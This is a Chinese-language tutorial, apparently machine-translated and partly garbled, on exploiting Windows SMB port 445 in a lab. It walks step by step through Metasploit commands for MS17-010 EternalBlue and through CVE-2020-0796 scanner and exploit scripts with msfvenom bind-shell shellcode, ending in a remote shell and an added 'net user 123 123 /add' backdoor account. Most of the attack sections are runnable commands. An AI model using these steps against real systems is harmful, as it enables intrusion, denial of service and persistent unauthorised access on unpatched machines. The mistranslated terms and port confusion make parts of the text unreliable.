443端口漏洞如何利用,哪种漏洞不可通过445端口进行利用
端口45用于访问共享文件夹。端口445是危险的,因为它在默认情况下是打开的。
目标:win7系统IP: 10.0.0.199提前关闭目标的防火墙。
一. MS17-010永恒之蓝
MS,17岁,脆弱性10。也就是新闻报道的比特币勒索病毒。
1.输入msfconsole: MSF控制台
2.找到要利用的漏洞并输入编号(搜索命令):搜索ms17-010
3.检查组件列表并选择要使用的攻击项目(使用命令):使用0
4.对于这个提示,需要配置有效载荷,所以根据提示,Tab键完成一次,出来配置菜单两次。
攻击负载:setpayload windows/x64/meter preter/(tab两次)
(这里,有效负载被设置为tcp的反向连接)
5.检查模块配置信息(有Yes的需要配置):命令:显示选项
查看哪些系统命令可能受到攻击:info
需要配置什么:本地主机IP: LHOST,目标IP: rhosts。
5.配置(set命令):
设置rhosts为10.0.0.199
返回上级:返回
6.开始攻击(漏洞利用命令):漏洞利用
7.攻击成功后提示建立会话。
"?"可以查看攻击物品。
示例:shell命令进入对方命令行。
此时可以在入侵界面操作命令,比如创建用户网user 123 123 /add。
同时win7无人机显示用户创建成功。
二。CVE-2020-0796永恒之蓝2.0
基于SMBv3的漏洞,Windows 8和最新版本的Windows Server 2012-Windows 10都被抓了。这是一个系统级的漏洞。利用这个漏洞会让系统遭受‘蠕虫式’攻击,也就是说很容易从一个受害者感染到另一个受害者,一开机就会被感染。你可以为所欲为,比如加密你的文件,敲诈你。比如像永恒之蓝1.0 (Eternal Blue 1.0),加密文件,勒索你虚拟货币。
准备
目标飞机:win10 IP:10.0.0.171
攻击
下载插件
将插件传递到kali系统的mnt文件夹中。
在kali主机上输入命令:python3 scanner.py 10.0.0.171。
意味着Win10中存在漏洞。
下载另一个插件
将插件传入kali的mnt文件夹。
在kali上输入命令:python 3 CVE-2020-0796 . py 10 . 0 . 0 . 171
结果是蓝屏。
3.第三个工具
(1)msfvenom生成正向连接的木马(只支持正向连接,不支持反向连接)
(msfvenom的详细使用方法请参考https://www.jianshu.com/p/dee2b171a0a0)
MSF venom-p windows/x64/meter preter/bind _ TCP LPORT=4444-b x00 -I 1-f python
将exploit.py的这一部分替换为生成的shellcode(buf后面的字符串,保留USER_PAYLOAD不变)
(2)打开kali的另一个xshell接口,在msfconsole下:打开msf monitoring。
使用漏洞利用/多重/处理程序
因为是反向壳,所以改成正向。
设置有效负载windows/x64/meter preter/bind _ TCP
设置lport 4444 //监听端口
设置rhost 10.0.0.171 //目标主机
(3)运行exploit.py脚本,弹回外壳。切换回第一个xshell接口。运行在第一步中修改的脚本
至此,壳就获得了。
例如,执行添加用户命令:
净用户123 123 /add
这时win10增加了一个123用户(密码123)。
三。MS08-067网络服务器攻击
同样的,这里就不赘述了。